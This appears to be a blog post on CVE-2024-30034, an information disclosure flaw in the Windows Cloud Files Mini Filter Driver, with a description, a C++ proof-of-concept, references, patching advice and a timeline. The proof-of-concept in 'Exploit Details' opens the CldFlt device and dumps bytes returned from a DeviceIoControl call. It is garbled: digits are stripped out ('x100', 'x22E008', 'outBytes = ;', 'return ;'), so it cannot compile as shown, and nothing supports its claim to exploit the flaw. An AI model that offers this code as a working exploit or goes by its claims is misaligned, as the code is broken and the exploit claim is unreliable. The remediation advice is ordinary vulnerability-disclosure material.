In today's post, we are going to discuss an important security vulnerability that was recently discovered in the Windows platform, specifically related to the Cloud Files Mini Filter Driver. This vulnerability, publicly known as "CVE-2024-30034", is related to an information disclosure issue in the Windows operating system. In this blog post, we'll uncover the details of the vulnerability, how it can be exploited, known remedies, code snippets to reproduce the issue, and links to original sources.

Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability (CVE-2024-30034)

The Windows Cloud Files Mini Filter Driver (also known as "CldFlt") is primarily used for syncing files between local storage and cloud storage services like OneDrive or Azure. It is a kernel-mode driver that intercepts file access requests and processes them according to the cloud files provider's specifications.

A security researcher recently discovered an information disclosure vulnerability in this driver. An attacker can exploit this vulnerability to obtain sensitive information from the system memory, which can potentially lead to more severe attacks or compromise the entire system. The vulnerability exploits a flaw in the driver's handling of file access requests that can be leveraged to leak the contents of the system memory.

Exploit Details

The information disclosure vulnerability CVE-2024-30034 can be exploited by sending crafted file system requests to the Windows Cloud Files Mini Filter Driver. When CldFlt processes these requests, it does not properly validate or sanitize the user input, leading to improper memory access. This results in the disclosure of sensitive data from the system memory.

The following is a code snippet that demonstrates the exploitation of this vulnerability

#include <Windows.h>
#include <iostream>

int main() {
    HANDLE hDevice = CreateFile(L"\\\\.\\CldFlt",
                                 GENERIC_READ | GENERIC_WRITE,
                                 , nullptr, OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL,
                                 nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cout << "Error opening CldFlt device: " << GetLastError() << std::endl;
        return 1;
    }
    
    BYTE buffer[x100] = {};
    DWORD outBytes = ;
    
    if (!DeviceIoControl(hDevice, x22E008, &buffer, sizeof(buffer),
                         &buffer, sizeof(buffer), &outBytes, nullptr)) {
        std::cout << "DeviceIoControl failed: " << GetLastError() << std::endl;
        CloseHandle(hDevice);
        return 1;
    }
    
    std::cout << "Memory leak: " << std::endl;
    for (DWORD i = ; i < outBytes; i++) {
        std::printf("x%02X ", buffer[i]);
    }
    std::cout << std::endl;
    
    CloseHandle(hDevice);
    return ;
}

It's important to note that an attacker requires local access to the target machine to exploit this vulnerability. However, once the memory leak is successful, it can provide the attacker with valuable information, including function pointers and possibly more critical data that could compromise the entire system.

Original References

The vulnerability was originally reported to Microsoft by the security researcher who discovered it. Microsoft has acknowledged the issue and released a security update to address the vulnerability. You can find more information about the vulnerability and the security update from the following original sources:

1. CVE-2024-30034 Detail - National Vulnerability Database
2. Microsoft Security Response Center - CVE-2024-30034

Remediation

To protect your systems against the CVE-2024-30034 vulnerability, it's essential to install the security updates provided by Microsoft. Regularly updating your systems and ensuring they are patched with the latest security updates is a crucial step in minimizing the risks of exploitation.

Moreover, system administrators should consider limiting access to the CldFlt driver only to necessary users and keeping the principle of least privilege in mind. Restricting access to sensitive components of the system prevents unauthorized users from exploiting such vulnerabilities.

Conclusion

The CVE-2024-30034 information disclosure vulnerability in the Windows Cloud Files Mini Filter Driver is a serious issue that potential attackers can exploit to access sensitive system information. To protect your systems, it's essential to apply the security updates provided by Microsoft and follow best practices such as the principle of least privilege and regular monitoring.

Timeline

Published on: 05/14/2024 17:17:06 UTC
Last modified on: 08/02/2024 01:25:00 UTC